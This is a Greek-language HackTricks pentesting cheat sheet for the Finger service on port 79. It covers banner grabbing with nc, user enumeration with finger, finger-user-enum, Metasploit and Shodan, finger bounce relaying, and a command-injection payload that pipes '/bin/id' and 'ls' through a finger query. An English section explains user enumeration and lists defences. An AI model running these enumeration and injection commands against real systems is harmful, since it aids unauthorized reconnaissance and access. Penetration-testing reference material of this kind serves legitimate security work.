# 79 - Ελεγκτική δοκιμή Finger
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)! Άλλοι τρόποι υποστήριξης του HackTricks: * Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)! * Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family) * **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
## **Βασικές πληροφορίες** Το πρόγραμμα/υπηρεσία **Finger** χρησιμοποιείται για την ανάκτηση λεπτομερειών σχετικά με τους χρήστες υπολογιστών. Συνήθως, οι παρεχόμενες πληροφορίες περιλαμβάνουν το **όνομα σύνδεσης του χρήστη, το πλήρες όνομα** και, σε ορισμένες περιπτώσεις, επιπλέον λεπτομέρειες. Αυτές οι επιπλέον λεπτομέρειες μπορεί να περιλαμβάνουν την τοποθεσία του γραφείου και τον αριθμό τηλεφώνου (εάν είναι διαθέσιμος), την ώρα που συνδέθηκε ο χρήστης, την περίοδο αδράνειας (χρόνος αδράνειας), την τελευταία φορά που ο χρήστης διάβασε το email και το περιεχόμενο των αρχείων σχεδίου και έργου του χρήστη. **Προεπιλεγμένη θύρα:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Απαρίθμηση** ### **Ανάκτηση Μπάνερ/Βασική σύνδεση** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Απαρίθμηση χρηστών** User enumeration is the process of gathering information about valid usernames on a target system. This information can be used by attackers to launch further attacks, such as brute-forcing passwords or attempting to gain unauthorized access to user accounts. There are several methods that can be used to perform user enumeration, including: - **Finger service**: The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. Attackers can use this service to query the target system and obtain a list of valid usernames. - **Username guessing**: Attackers can attempt to guess valid usernames by using common naming conventions, such as first names, last names, or combinations of the two. They can also use publicly available information, such as social media profiles or company directories, to gather potential usernames. - **User enumeration tools**: There are various tools available that automate the process of user enumeration. These tools can perform tasks such as querying the Finger service, brute-forcing usernames, or scraping websites for potential usernames. To protect against user enumeration attacks, it is important to implement proper security measures, such as: - **Disable Finger service**: If the Finger service is not required, it is recommended to disable it to prevent attackers from querying the system for user information. - **Implement account lockouts**: Implementing account lockouts after a certain number of failed login attempts can help prevent brute-force attacks. - **Use strong and unique usernames**: Avoid using common naming conventions for usernames and ensure that each user has a unique username that is not easily guessable. - **Monitor and log failed login attempts**: Monitoring and logging failed login attempts can help identify potential user enumeration attacks and allow for timely response and mitigation. By understanding the techniques used in user enumeration attacks and implementing proper security measures, organizations can better protect their systems and user accounts from unauthorized access. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Εναλλακτικά, μπορείτε να χρησιμοποιήσετε το **finger-user-enum** από το [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), μερικά παραδείγματα: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Το Nmap εκτελεί ένα script για να κάνει χρήση των προεπιλεγμένων scripts** ### Το Metasploit χρησιμοποιεί περισσότερα κόλπα από το Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Εκτέλεση εντολής ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Αναπήδηση του Finger [Χρησιμοποιήστε ένα σύστημα ως αναμεταδότης του finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)! Άλλοι τρόποι για να υποστηρίξετε το HackTricks: * Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)! * Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family) * **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.